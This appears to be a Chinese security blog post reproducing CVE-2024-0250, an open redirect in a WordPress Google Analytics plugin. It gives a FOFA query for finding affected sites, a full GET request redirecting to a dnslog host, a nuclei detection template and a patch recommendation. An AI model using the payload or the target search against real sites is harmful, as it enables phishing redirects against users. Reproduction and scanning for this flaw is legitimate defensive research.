CVE-2024-0250 漏洞复现

admin

138744
文章

114
评论

2024年6月14日10:43:04评论61 views字数 2155阅读7分11秒阅读模式

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

—

漏洞名称

Google Analytics开放重定向漏洞

—

漏洞影响

Google Analytics 4 < 6.3

—

漏洞描述

由于重定向oauth2callback.php文件验证不足，该插件易受Open Redirect攻击。这使得未经身份验证的攻击者有可能将用户重定向到潜在的恶意网站，如果他们能够成功地诱骗用户执行操作的话。

—

FOFA搜索语句

body="/wp-content/plugins/analytics-insights"

CVE-2024-0250 漏洞复现

—

漏洞复现

可以结合dnslog来复现该漏洞，先随机注册一个dnslog账户https://eyes.sh/dns/ ，然后复制payload到poc数据包中，完整数据包如下：

GET /wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://ai8akwkt.eyes.sh/%3f&code=x HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.6.26Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

get请求也可以用浏览器打开，然后观察DNSlog记录

CVE-2024-0250 漏洞复现

漏洞复现成功

—

nuclei poc

nuclei 官方已发布POC，内容如下

id: CVE-2024-0250
info:  name: Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect  author: securityforeveryone  severity: medium  description: |    The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.  remediation: |    Fixed in 6.3  reference:    - https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/    - https://github.com/fkie-cad/nvd-json-data-feeds    - https://nvd.nist.gov/vuln/detail/CVE-2024-0250  classification:    epss-score: 0.00043    epss-percentile: 0.0866  metadata:    max-request: 1    verified: true    fofa-query: body="/wp-content/plugins/analytics-insights"    publicwww-query: "/wp-content/plugins/analytics-insights"  tags: cve,cve2024,wpscan,redirect,wp,wp-plugin,wordpress,analytics-insights
http:  - method: GET    path:      - "{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x"
    matchers:      - type: regex        part: header        regex:          - '(?m)^(?:Locations*?:s*?)(?:https?://|//)?(?:[a-zA-Z0-9-_.@]*)oast.me.*$'# digest: 4a0a004730450220508ba6949e0997c93c3e04a75108bac0d84fd29cdf91842239f76d788c8d60f9022100bb118773932c0732f921c1e1dca30fa00cf7826b60410268e292e051434a276a:922c64590222798bb761d5b6d8e72950

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-0250.yaml -l data1.txt

CVE-2024-0250 漏洞复现

—

修复建议

升级到最新版本。

原文始发于微信公众号（AI与网安）：CVE-2024-0250 漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2024-0250 漏洞复现

hi-bridge网关-download文件读取

arris路由器basic_sett未授权信息泄露

OneBlog最新模板注入漏洞（CNVD-2025-06047、CVE-2024-54954）

Langflow 远程命令执行 POC

Sapido RB- 1732 路由器命令执行漏洞

【高危漏洞】Windows 11：300毫秒即可提权至管理员

NetMizer日志管理系统远程命令执行漏洞

科拓全智能停车收费系统SQL注入漏洞

漏洞复现 || Vite import存在任意文件读取漏洞

Argo Events权限管理不当漏洞

发表评论

在线咨询

微信